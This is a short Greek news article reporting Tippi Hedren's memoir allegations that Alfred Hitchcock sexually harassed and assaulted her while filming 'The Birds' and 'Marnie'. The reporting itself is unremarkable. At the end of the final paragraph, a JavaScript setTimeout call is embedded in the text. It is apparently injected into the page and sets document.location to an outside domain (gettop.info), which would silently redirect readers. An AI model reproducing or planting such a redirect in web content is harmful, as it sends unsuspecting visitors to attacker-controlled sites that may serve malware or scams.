Για σεξουαλική παρενόχληση κατηγορεί η Τίπι Χέντρεν τον Χίτσκοκ

0
40

 

Κατηγορίες για σεξουαλική παρενόχληση εξαπολύει η εμβληματική πρωταγωνίστρια Τίπι Χέντρεν εναντίον του Άλφρεντ Χίτσκοκ στη νέα της αυτοβιογραδία με τίτλο «Tippi: A Memoir».

Η 86χρονη σταρ υποστηρίζει στο βιβλίο της ότι κατά τα γυρίσματα των ταινιών «Τα πουλιά» και «Μάρνι», δέχτηκε σεξουαλική επίθεση από τον Χίτσκοκ.

Όπως καταγγέλλει, η ηθοποιός σε αποσπάσματα που δημοσιεύει η Daily Mail, η επιθετική συμπεριφορά του Χίτσκοκ άρχισε από την πρώτη στιγμή που η Χέντρεν συμπεριελήφη στο καστ για την ταινία «Τα πουλιά».

Η σταρ ισχυρίζεται ότι ο σκηνοθέτης έδωσε εντολή στους υπόλοιπους ηθοποιούς να μην κάνουν παρέα μαζί της και να μην την αγγίζουν ενώ ήταν ιδιαίτερα νευρικός όταν μιλούσε με άλλους άνδρες. Όπως υποστηρίζει μία φορά έπεσε πάνω της και προσπάθησε να τη φιλήσει, ενώ για να την τιμωρήσει επειδή δεν ανταποκρινόταν στις σεξουαλικές επιθυμίες του της προκάλεσε εσκεμμένα τραυματισμούς σε πολλές σκηνές από τα γυρίσματα της ταινίας «Τα πουλιά».

Επίσης, στη «Μάρνι» η οποία ήταν η επόμενη ταινία που συνεργάστηκε με τον σκηνοθέτη, η Χέντρεν πιστεύει ότι η σκηνή του βιασμού της ήταν μία από τις φαντασιώσεις του σκηνοθέτη.

Μάλιστα τον κατηγορεί ότι παρήγγειλε μία μάσκα αντίγραφο του προσώπου της παρότι δεν ήταν απαραίτητο για την ταινία, ενώ τοποθέτησε το καμαρίνι της δίπλα στο γραφείο του και είχε πρόσβαση σ’ αυτό από μία ενδιάμεση πόρτα.

Δεν είναι η πρώτη φορά που η Χέντρεν αποκαλύπτει την καταχρηστική συμπεριφορά του σπουδαίου σκηνοθέτη ο οποίος ήταν γνωστός για τον αυταρχικό και μισογυνικό χαρακτήρα του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here